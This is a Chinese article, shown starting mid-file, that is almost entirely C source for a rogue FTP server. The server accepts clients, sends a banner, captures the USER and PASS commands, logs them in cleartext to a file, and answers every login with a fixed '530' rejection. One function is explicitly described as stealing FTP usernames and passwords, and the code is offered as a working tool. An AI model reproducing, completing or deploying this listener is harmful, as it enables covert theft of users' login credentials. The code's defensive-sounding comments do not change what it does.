利用ftp服务本身缺陷取得最高权限
// Return Type: BOOLEAN
// Parameters:
// In: const SOCKET ClientSocket --> The Client Connected Socket
// In: const int nSize --> The SocketBuffer's Size
// Out: char *SocketBuffer --> Buffer To Receive Data
//--------------------------------------------------------------------------------------------
BOOL ReceiveSocketBuffer(const SOCKET ClientSocket,char *SocketBuffer,const int nSize)
{
    // Performs one recv() of at most nSize bytes into SocketBuffer.
    // Returns TRUE only when at least one byte arrived; a closed connection
    // (0) and a socket error (negative) both come back as FALSE.
    // The byte count is discarded and no '\0' is appended, so a caller that
    // treats SocketBuffer as a C string must pre-zero it and leave room for
    // the terminator itself.
    int Received = recv(ClientSocket, SocketBuffer, nSize, 0);

    return (Received > 0);
}// End Of ReceiveSocketBuffer()
//--------------------------------------------------------------------------------------------
// Purpose: To Check Whether A String Only Contains Digits
// Return Type: BOOLEAN
// Parameters:
// In: const char *String --> The String To Be Checked
//--------------------------------------------------------------------------------------------
BOOL IsDigits(const char *String)
{
    // Walks the string up to its terminator and rejects it on the first
    // character outside '0'..'9' (ASCII 48..57).
    // An empty string has no offending character and therefore yields TRUE.
    const char *Cursor;

    for (Cursor = String; *Cursor != '\0'; Cursor++)
    {
        if (*Cursor < '0' || *Cursor > '9')
        {
            return FALSE;
        }
    }
    return TRUE;
}// End Of IsDigits()
//--------------------------------------------------------------------------------------------
// Purpose: To Save Information Into A File
// Return Type: BOOLEAN
// Parameters:
// In: const char *FileName --> File To Store Information
// In: const char *Info --> Information To Be Stored Into File
//--------------------------------------------------------------------------------------------
BOOL SaveInfo(const char *FileName,const char *Info)
{
    // Appends the NUL-terminated text Info to FileName, creating the file
    // when it does not exist yet (OPEN_ALWAYS).
    // Returns FALSE when the file cannot be opened, otherwise the WriteFile()
    // result. Info is written verbatim: nothing is escaped or filtered, so
    // text that originated from a network peer lands in the file unchanged.
    // The security-attributes argument is NULL, so the file gets the default
    // security descriptor rather than a restricted one.
    DWORD Written = 0;
    BOOL Ok;
    HANDLE Out = CreateFile(FileName,
                            GENERIC_READ | GENERIC_WRITE,
                            FILE_SHARE_WRITE,
                            NULL,
                            OPEN_ALWAYS,
                            FILE_ATTRIBUTE_NORMAL,
                            NULL);

    if (Out == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }

    // Move to the end first so existing content is kept and the new text is appended.
    SetFilePointer(Out, 0, NULL, FILE_END);
    Ok = WriteFile(Out, Info, strlen(Info), &Written, NULL);
    CloseHandle(Out);
    return Ok;
}// End Of SaveInfo()
//--------------------------------------------------------------------------------------------
// Purpose: To Remove An Ending Enter From A String
// Return Type: BOOLEAN
// Parameters:
// In: char *String --> String To Be Modified
//--------------------------------------------------------------------------------------------
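BOOL DeleteEnter(char *String)
{
    // Strips a trailing line break from String in place.
    // The string is cut at the second-to-last position when that character
    // is '\r' or '\n' (whatever follows it is dropped as well); otherwise it
    // is cut at the last position when that one is '\r' or '\n'.
    // Returns FALSE for a NULL pointer, TRUE in every other case.
    //
    // Each index is checked against the length before use: on an empty or
    // one-character string the unsigned expression Length - 2 wraps around
    // and would otherwise index far outside the buffer.
    size_t Length;

    if (String == NULL)
    {
        return FALSE;
    }

    Length = strlen(String);
    if (Length >= 2 && (String[Length - 2] == '\r' || String[Length - 2] == '\n'))
    {
        String[Length - 2] = '\0';
    }
    else if (Length >= 1 && (String[Length - 1] == '\r' || String[Length - 1] == '\n'))
    {
        String[Length - 1] = '\0';
    }
    return TRUE;
}// End Of DeleteEnter()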
//--------------------------------------------------------------------------------------------
// Purpose: To Handle FTP Request
// Return Type: BOOLEAN
// Parameters: NONE
//--------------------------------------------------------------------------------------------
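BOOL HandleFTPRequest()
{
    // Accept loop: takes connections from ListenSocket and hands each one to
    // its own FTPThread. ListenSocket is not set up here; presumably it is
    // already bound and listening when this function is called.
    // The loop ends when accept() fails; ListenSocket is then closed and the
    // function returns TRUE.
    DWORD dwThreadID;
    SOCKET AcceptSocket = INVALID_SOCKET;
    SOCKET *CloneSocket = NULL;
    HANDLE hThread = NULL;

    while (TRUE)
    {
        SOCKADDR_IN client;
        int nSize = sizeof(client);

        // The peer address is filled in but never read or logged below.
        AcceptSocket = accept(ListenSocket, (SOCKADDR *)&client, &nSize);
        if (AcceptSocket == INVALID_SOCKET)// Something Is Wrong About The Socket
        {
            break;
        }

        // The socket value is copied to the heap so the thread receives its
        // own copy; AcceptSocket is overwritten on the next iteration.
        CloneSocket = (SOCKET *)malloc(sizeof(AcceptSocket));
        if (CloneSocket == NULL)
        {
            closesocket(AcceptSocket);// Close That Connection
            continue;
        }
        *CloneSocket = AcceptSocket;

        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FTPThread, CloneSocket, 0, &dwThreadID);
        if (hThread != NULL)
        {
            // The thread now owns CloneSocket and the connection; only the
            // thread handle is released here.
            CloseHandle(hThread);
        }
        else
        {
            // No thread was started, so nothing else will ever close the
            // connection or free the copy; release both here instead of
            // leaking one socket and one allocation per failed attempt.
            closesocket(AcceptSocket);
            free(CloneSocket);
        }
    }
    closesocket(ListenSocket);
    return TRUE;
}// End Of HandleFTPRequest()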
//--------------------------------------------------------------------------------------------
// Purpose: To Steal The FTP UserName And Password
// Return Type: BOOLEAN
// Parameters:
// In: const SOCKET ClientSocket --> The Connector's Socket
//--------------------------------------------------------------------------------------------
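BOOL RetrieveFTPUserAndPass(const SOCKET ClientSocket)
{
    // Reads the USER and then the PASS command from the connected client and
    // appends both lines, unmodified, to LogFile between two separator lines.
    // Returns TRUE only when both commands were received in that order and
    // the "331" reply between them was sent; any other outcome returns FALSE.
    //
    // FTP carries USER and PASS in cleartext, so whichever process holds the
    // listening socket reads them as-is; only a transport that authenticates
    // the server and encrypts the session (FTPS, SFTP) keeps them from an
    // unexpected listener. LogFile ends up holding those cleartext values.
    //
    // Each command is taken from a single recv(); a line split across several
    // TCP segments is not reassembled.
    const char *UserOK = "331 User name okay, need password.\r\n";
    char Buffer[MAX_PATH];

    memset(Buffer,0,sizeof(Buffer));
    // Receive at most sizeof(Buffer) - 1 bytes: the last byte of the zeroed
    // buffer then always stays '\0'. With the full size, a peer sending
    // MAX_PATH bytes left the buffer unterminated and SaveInfo()'s strlen()
    // read past the end of this stack array.
    if (!ReceiveSocketBuffer(ClientSocket,Buffer,sizeof(Buffer) - 1))// Fail To Receive UserName
    {
        return FALSE;
    }
    if (strnicmp(Buffer,"USER", 4) != 0)// Unknown Command Received
    {
        return FALSE;
    }
    // cs serialises the two writes so entries from parallel sessions do not interleave.
    EnterCriticalSection(&cs);
    SaveInfo(LogFile,"---------------------------------------------------------------------------\r\n");
    SaveInfo(LogFile,Buffer);
    LeaveCriticalSection(&cs);

    if (!SendSocket(ClientSocket,UserOK))// Fail To Send Information
    {
        return FALSE;
    }

    memset(Buffer,0,sizeof(Buffer));
    if (!ReceiveSocketBuffer(ClientSocket,Buffer,sizeof(Buffer) - 1))// Fail To Receive Password
    {
        return FALSE;
    }
    if (strnicmp(Buffer,"PASS", 4) != 0)// Unknown Command Received
    {
        return FALSE;
    }
    EnterCriticalSection(&cs);
    SaveInfo(LogFile,Buffer);
    SaveInfo(LogFile,"---------------------------------------------------------------------------\r\n\r\n");
    LeaveCriticalSection(&cs);
    return TRUE;
}// End Of RetrieveFTPUserAndPass()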
//--------------------------------------------------------------------------------------------
// Purpose: To Handle The Connector's Request
// Return Type: DWORD
// Parameters:
// In: LPVOID Para --> The Connector's Socket
//--------------------------------------------------------------------------------------------
DWORD WINAPI FTPThread(LPVOID Para)
{
    // Per-connection thread entry point.
    // Para points to a heap-allocated SOCKET; the value is copied out and the
    // allocation is freed here, so the caller must not touch it afterwards.
    // Returns 1 when the banner could not be sent, 0 otherwise.
    //
    // The result of RetrieveFTPUserAndPass() is ignored: every session that
    // got past the banner ends with the same fixed "530" reply, whatever the
    // client submitted. That constant reply directly after PASS is a stable
    // string to match when looking for this listener on a network.
    SOCKET *Handoff = (SOCKET *)Para;
    SOCKET ClientSocket = *Handoff;
    DWORD ExitCode = 1;

    free(Handoff);

    if (SendFTPBanner(ClientSocket))
    {
        RetrieveFTPUserAndPass(ClientSocket);
        SendSocket(ClientSocket,"530 Not logged in, unauthorized IP address.\r\n");
        ExitCode = 0;
    }

    closesocket(ClientSocket);// Disconnect The Connector On Every Path
    return ExitCode;
}// End Of FTPThread()
// End Of File
- 文章作者: 福州军威计算机技术有限公司
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。